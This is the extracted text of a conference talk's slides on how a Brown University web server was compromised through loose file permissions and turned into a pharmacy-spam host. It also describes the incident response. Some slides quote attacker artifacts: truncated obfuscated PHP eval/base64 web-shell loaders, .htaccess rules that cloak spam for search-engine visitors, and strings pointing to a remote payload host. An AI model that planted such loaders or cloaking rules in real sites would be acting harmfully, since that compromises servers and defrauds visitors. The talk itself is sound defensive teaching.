Date post: | 25-Dec-2014 |
Category: |
Technology |
Upload: | patrick-laverty |
View: | 590 times |
Download: | 0 times |
Anatomy of a Web Server Hack (it wasn’t fun or profitable)
(for me)
Patrick Laverty Brown University
OWASP Rhode Island BSides Rhode Island
TwiGer: @ProvWebAppSec
1
Who Am I?
• Programmer/WebSec guy at Brown University • PaulDotCom Intern
• hGp://www.securitybsides.com/BSidesRI
• OWASP Rhode Island
2
What Happened?
• We got DoS’d
3
What Happened?
• We got DoS’d • (UnintenSonally) By
4
Step Back -‐ Timeline
• Holiday weekend, 1 dept site down • Reports pharmaspam in Google results
5
Step Back -‐ Timeline
• Holiday weekend, 1 dept site down • Reports pharmaspam in Google results
• 7 pm, database server maxed out
• Kill processes, they come back
• Renaming databases, sites down
6
Step Back -‐ Timeline
• Holiday weekend, 1 dept site down • Reports pharmaspam in Google results
• 7 pm, database server maxed out
• Kill processes, they come back
• Renaming databases, sites down
• But most importantly…
7
Step Back -‐ Timeline
8
Protect www.brown.edu
Why Did It Happen?
• We’re a University • Open and easy • Security is a hassle
9
OK, Really Why?
• One word: FilePermissions
10
OK, Really Why?
• Two words: File Permissions
11
OK, Really Why?
• Two words: File Permissions • >1200 accounts • 600 GB of files • Hundreds of sites
12
OK, Really Why?
• Two words: File Permissions • More history: – Solaris Web Server
– 16 groups per user max – Web server user – Thousands of groups on server – World Readable
13
OK, Really Why?
• rwxrwxr-‐x • Security Problem?
14
OK, Really Why?
• rwxrwxr-‐x • Security Problem?
• Config files & db connecSon scripts • mysql_connect(db,user,password);
• Policy: No sensiSve info
15
OK, Really Why?
• Upgraded to Red Hat Linux • No limit to groups
• Put server in every group • Removed world read: ie. rwxrwx-‐-‐-‐
16
OK, Really Why?
• Everything is writeable!
17
OK, Really Why?
• Everything is writeable! • Whoops
18
Discovery
19
Discovery
<?php eval(gzinflate(base64_decode('5b1rd9u20ij8OV2r/wFmtUupkWVJTtLUthQ7jp04TezUl1xq56iUREmsKVElKStu6v9+ZgYXArzIstP9PO9Zb/ZuIgKDwQAYAAPMYOb770rOLB51pk4UsRaz1hvNevfpzz93+93HP7u/1Hv9p/31R936et1xm48f963N778r9QI/CBH6h/7gMaX03YEz8+OO04u9YAJZ9r7nu9FbZ2Lr2b…
20
Discovery
21
What Can That Do?
• Add New Files • Edit Current Files • Find Places to Hide Files • Change Timestamps
22
What DID It Do?
• Add New Files • Edit Current Files • Find Places to Hide Files • Change Timestamps
• Examples?
23
Stupid .htaccess Tricks I
RemoveHandler .html .htm AddType applicaSon/x-‐hGpd-‐php .php .htm .html
24
Stupid .htaccess Tricks II
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR] RewriteCond %{HTTP_REFERER} (google|aol|yahoo) RewriteBase / RewriteCond %{THE_REQUEST} / RewriteCond %{REQUEST_URI} !/stats\.php RewriteRule .+ stats.php [L] </IfModule>
25
Stupid .htaccess Tricks II
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR] RewriteCond %{HTTP_REFERER} (google|aol|yahoo) RewriteBase / RewriteCond %{THE_REQUEST} / RewriteCond %{REQUEST_URI} !/stats\.php RewriteRule .+ stats.php [L] </IfModule>
26
Weird Google Results
27
Two Views
• Browser: normal • Google, Yahoo, other search spiders?
28
Look Familiar?
<?php
//Packed MySQL query core
$a4f12b6950e98b=str_rot13('tmhapbzcerff');$a4f12b6950e98f=str_rot13(strrev('rqbprq_46rfno')); eval($a4f12b6950e98b($a4f12b6950e98f('eF6NVGu2kAQ/ZU8VCKRqgrbJZFV5YGoxQilVLitvd6qinyBILApCiHBfH13zSAktkoL7OGOXM7uzO7H4LbHzf9259/OndO1+85zlX38uqu8/e6…
29
De-‐obfuscated max_execuSon_Sme set_Sme_limit
hGp://files-‐uploader.com/7291-‐bred/
…
REMOTE_ADDR
QUERY_STRING
SERVER_SIGNATURE
REQUEST_URI
REMOTE_ADDR
…
allow_url_fopen
curl_init
viagra
cialis
30
Uh-‐Oh max_execuSon_Sme set_Sme_limit
hGp://files-‐uploader.com/7291-‐bred/
…
REMOTE_ADDR
QUERY_STRING
SERVER_SIGNATURE
REQUEST_URI
REMOTE_ADDR
…
allow_url_fopen
curl_init
viagra
cialis
31
Uh-‐Oh max_execuSon_Sme set_Sme_limit
hGp://files-‐uploader.com/7291-‐bred/
…
REMOTE_ADDR
QUERY_STRING
SERVER_SIGNATURE
REQUEST_URI
REMOTE_ADDR
…
allow_url_fopen
curl_init
viagra
cialis
32
What’s There?
33
What Are Those?
34
Why the DoS?
max_execuSon_Sme set_Sme_limit hGp://files-‐uploader.com/7291-‐bred/ … REMOTE_ADDR QUERY_STRING SERVER_SIGNATURE REQUEST_URI REMOTE_ADDR … allow_url_fopen curl_init viagra cialis
35
Why the DoS? What Happens?
• Google as Referrer -‐> hit page in .htaccess • Page pulls in code from files-‐uploader.com
• Shows page selling Viagra • Brown University = Online Pharmacy
• Plus, high Google ranking
36
How Do You Find It?
37
How’d We Fix It?
Immediate Steps – Deleted the current offending uploader script & redirecSng .htaccess files
– Traffic dropped off immediately
38
How’d We Fix It?
Ongoing Steps – Remove all shell files
– Remove all uploader files – Find and fix the .htaccess files – Remove the web server user as much as possible
– Weakened the shell files – Set up shell file password search in logs – Monthly meeSngs to review
39
How Else is it Being Fixed?
• One Word… • FilePermissions!
40
How Else is it Being Fixed?
• One Word… • FilePermissions!
• Three OpSons for Site Owners
41
OpSon 1
• One web editor? • rwxr-‐x-‐-‐-‐ • Web server user in the group
42
OpSon 2
• MulSple web editors • rwxrwxr-‐x • Web server user NOT in the group
• Back to original security problem
43
OpSon 3
• Virtual Machine • Do whatever you want!
44
BoGom Line
• Keep file permissions Sght • Keep so�ware current • Keep users off server
45
QuesSons?
Contact Info: Patrick Laverty
Brown University
@provwebappsec or @BSidesRI
46